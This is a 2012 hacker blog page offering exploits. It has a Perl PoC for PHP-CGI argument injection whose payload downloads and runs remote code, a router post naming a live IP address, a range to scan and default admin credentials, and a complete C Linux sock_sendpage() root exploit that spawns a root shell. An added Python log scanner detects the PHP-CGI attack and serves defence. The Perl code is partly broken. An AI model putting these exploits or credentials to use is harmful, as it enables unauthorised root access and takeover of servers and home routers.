
[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so pls don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec(),

which IS a PHP CGI function, and the ONLY way it will definitely exec!

Ok now on with the show….


#!/usr/bin/perl
## PHP CGI exec-cmd/injection of code thru php tags by (xd)
###Greetz: My channel on efnet / #Haxnet , ppl @ps in it
###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG
###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)
###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))
###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..
###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)
### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}


Enjoy / xd–
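Added here as a defender-side example, not part of xd's post: a small Python scanner that flags the php-cgi argument injection this PoC relies on in web access logs. It assumes the common log format and uses constructed sample lines; php-cgi only treats the query string as command-line arguments when it contains no literal '=', which is why the PoC encodes '=' as %3D.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format), not taken from
# the original post. Line 2 mirrors the PoC's "-d" injection; line 3 is the
# encoded-dash "-s" source-disclosure form; line 4 is a benign lookalike.
SAMPLE_LOG = """\
203.0.113.5 - - [06/May/2012:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512
203.0.113.9 - - [06/May/2012:10:00:02 +0000] "POST /cgi-bin/php?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://198.51.100.7/x.txt HTTP/1.1" 200 77
203.0.113.9 - - [06/May/2012:10:00:03 +0000] "GET /cgi-bin/php?%2Ds HTTP/1.1" 200 9001
203.0.113.5 - - [06/May/2012:10:00:04 +0000] "GET /search?q=-d HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# php.ini directives that turn the argument injection into remote code execution
DANGEROUS_DIRECTIVES = ("allow_url_include", "auto_prepend_file", "disable_functions", "open_basedir")


def classify_request(target):
    """Return a finding dict for one request target, or None when benign.

    php-cgi passes the query string as argv only when it holds no literal
    '=' (the CGI 'indexed query' rule) and splits it on '+'; an attacker
    therefore encodes '=' as %3D and the dash as %2D. A query like 'q=-d'
    contains '=' and is never argument-injected, so it is not flagged.
    """
    query = urlsplit(target).query
    if not query or "=" in query:
        return None
    args = [unquote(a) for a in query.split("+")]
    if not any(a.startswith("-") for a in args):
        return None
    hit = [d for d in DANGEROUS_DIRECTIVES if any(d in a for a in args)]
    return {"args": args, "directives": hit, "severity": "high" if hit else "medium"}


def scan_log(text):
    """Run classify_request over each log line; return one finding per hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(line=lineno, client=line.split(" ", 1)[0], method=m.group("method"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']} {f['method']} {f['severity']}: {f['args']} {f['directives']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; a "high" finding means a request tried to flip php.ini directives through the CGI argv path, which a patched php-cgi (or a rewrite rule that rejects query strings starting with "-" or "%2D") should block.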

PoC : WindWeb/2.0 Server admin add exploit, carnage for ANY .kr/.tw ! Kept pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

I'll make it short and sweet, but I can tell you NOW this is usable across MANY routers, and yes, it DOES matter on some routers whether they enable or disable ports 80/443, which Netgear does, and obviously this brand doesn't :P

Here we go… to add an admin or just overwrite one. Info details for the exploit / jmp point and server error for gdb … have fun!


Like, you will need to find your OWN index.html, as this MUST simply be changed. So when you find one (an example would be to scan the 220.76.* range), then learn some about routers, find a WindWeb, and it should be in
their admin page. BUT this is accessed remotely, and locally, and after you change the pass... I doubt many opers even change router passes once set, so you make abs no logs really; nothing shows to them unless it is some heavy-duty server :s
So yes, it can be very VERY nice, but I'm not going to hand out a *how to* on finding them. Simple: find em yaself!
220.76.166.73:80 was this box btw, so as you see, 220 is obviously an ADSL range and yea, what stupid-ass server runs a router admin on port 80? THIS ONE! bahha

Did we contact them? Umm, no. Did they pay us to do any work for them? No.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0
Connection: close
Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: Korean HOME routers / BIZ routers ALL affected. Noted: 4mb and fast on the ADSL alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass

[OLD-UPDATED]: Linux sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64 (MMAP redone v2)+READ About using vmap()

Posted on 24th November 2011 in Codes, Exploits

Yea yea.. it is OLD!
Just notice that playing a bit with mmap vals will get you root still.. but be creative ;) hint is given in-code..
Now the old-ass c0de :P (Note the sendfile is done without using mmap/null ;)

FROM SOMEONE WHO WANTED TO KNOW WHY… So I have tried to explain things here without editing the code, because that won't do… anyhow, I hope this explains a few things about mmap and vmap to those who do not yet get this sh1t.

I have checked 3 hosts, not working for me:
Linux xx.com 2.6.18-274.12.1.el5.centos.plus #1 SMP Tue Nov 29 18:16:47 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
t.c: In function ‘main’:
t.c:147: warning: passing argument 1 of ‘mmap’ makes pointer from integer without a cast

-> failed to mmap: Invalid argument

UPDATE: NOW only updated it because of a non-working CentOS x86_64, so let's fix that back, ok… this is easy….
We only did mess with PAGE_SIZE of mmap(), right?
So first we do this,

// #define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

so it won't use the internal mmap, which would not matter anyhow; the exploit should STILL work. But anyhow there are 2 ways to address this last mmap bit, and that's to add in a static figure: some boxes are mmap(4096,NULL().., whilst some MUST be NULL, so you might want to try using the NULL version of the exploit, which can be found on many repos, and it is also disguised as sendpage 2010 or 2010, I believe. I released that version compiled even, somewhere, working fine; heck, works for me. Never really watched for what kernels, but I must admit I had NOT tried this on a CentOS of late. But we all know this type of mmap() bug: most boxes block mmap() use AT ALL in userland, and those who don't will have some grsec or just preventive techniques which make mapping it to NULL almost impossible.

Heck, if you want to offer another vector for this: I have considered using vmap(), which someone from my channel did do and demonstrated that it works. But also we have another mmap size (my bad, I forgot this one, and it might actually work for CentOS), that's simply mmap(4096 * 2,NULL.., same as the rest of it. This is all you could do maybe with mmap, max values I think*. But on vmap, you only have I believe that value and NULL also, yes, but I have yet to try to convert anything to use vmap, as it still sits where mmap() is in kernel world, which is a very tough secure place. But then again, as I said, I don't think this method, vmap() addr, has been used at all yet, and could have been, and would probably A. not trigger ANYTHING the admins have set to kill any mmap(0, and even B. bypass the grsec ACL (this is NOT the grsec kernel, the ACL), and maybe C. bypass, or just get to map the page, because the kernel sees what is usually a very normal thing :s… so yea, hell… good point out to me in the comment, but please, learn to use mmap() a bit then ask me things like this :S lol.. take care.
XD

/*
 *  Linux PF_UNIX or PF_BLUETOOTH sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64
 *  ****PF_UNIX socket-vector
 *
 * Exploit was tested on:
 * CentOS 5.7 (2.6.18-274.el5)
 * Red Hat Enterprise Linux 5.7 (2.6.18-274.6.1.el5)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * Ubuntu 11.10 (Latest 2011) - Mixed results,depends on the version of kernel.. 2.6.32.6 seems abit better
 *
 * For i386 and PPC i386, compile with the following command:
 * gcc -Wall -o sendpage sendpage.c
 * And for x86_64 and PPC64:
 * gcc -Wall -m64 -o sendpage sendpage.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <unistd.h>

#define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

//#ifndef PF_UNIX
//#define PF_UNIX AF_UNIX
//#define AF_UNIX 11             // Adjust this... some boxes will want this IN
//#endif

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movq %%rsp,%0; " : "=r" (sp));
	return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movl %%esp,%0" : "=r" (sp));
	return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("mr %0,%%r1; " : "=r" (sp));
	return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct;
	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
	return task_struct;
}
#else
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
	thread_info = current_stack_pointer() & ~(4096 - 1);
	if (*(unsigned long *)thread_info >= 0xc0000000) {
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	}
	task_struct = current_stack_pointer() & ~(8192 - 1);
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
#if defined(__LP64__)
	task_struct = current_stack_pointer() & ~(16384 - 1);
#else
	task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (task_struct[0] == uid && task_struct[1] == uid &&
	task_struct[2] == uid && task_struct[3] == uid &&
	task_struct[4] == gid && task_struct[5] == gid &&
	task_struct[6] == gid && task_struct[7] == gid) {
	task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] =task_struct[4] = task_struct[5] =
	task_struct[6] = task_struct[7] = 0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (!task_struct[0]) {
	task_struct++;
	continue;
	}
	if(task_struct[0]==task_struct[1]&&task_struct[0]==task_struct[2]&&
	task_struct[0]==task_struct[3]&&task_struct[4]==task_struct[5]&&
	task_struct[4]==task_struct[6]&&task_struct[4]==task_struct[7]) {
        task_struct[0]=task_struct[1]=task_struct[2]=task_struct[3]=task_struct[4]=
        task_struct[5]=task_struct[6]=task_struct[7]=0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#endif

int main(void) {
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/fdlist.SUX";
#if defined(__i386__) || defined(__x86_64__)
	uid = getuid(), gid = getgid();
#endif
        if((addr=mmap(PAGE_SIZE,NULL,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED){
	perror("-> failed to mmap");
	exit(EXIT_FAILURE);
	}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	addr[0] = '\xff';
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
	addr[0] = '\x3f';
	addr[1] = '\xe0';
	*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
	addr[4] = '\x63';
	addr[5] = '\xff';
	*(unsigned short *)&addr[6] = (unsigned short)change_cred;
	addr[8] = '\x7f';
	addr[9] = '\xe9';
	addr[10] = '\x03';
	addr[11] = '\xa6';
	addr[12] = '\x4e';
	addr[13] = '\x80';
	addr[14] = '\x04';
	addr[15] = '\x20';
#endif
#endif
	if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
	perror("-> socket");
	exit(EXIT_FAILURE);
	}
	if ((in_fd = mkstemp(template)) == -1) {
	perror("-> mkstemp");
	exit(EXIT_FAILURE);
	}
	if(unlink(template) == -1) {
	perror("-> unlink");
	exit(EXIT_FAILURE);
	}
	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
	perror("-> ftruncate");
	exit(EXIT_FAILURE);
	}
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
	execl("/bin/sh", "/bin/sh", "-i", NULL);
	exit(EXIT_SUCCESS);
}

Yea yea, it is modified a little, to gain a rootshell 100% withOUT using PER_SVR/mmap_min_addr, although that would
do for PPC and PPC64; payloads are done accordingly, compile it RIGHT!
xd– / #HaxNET && #HaxSHELLS !
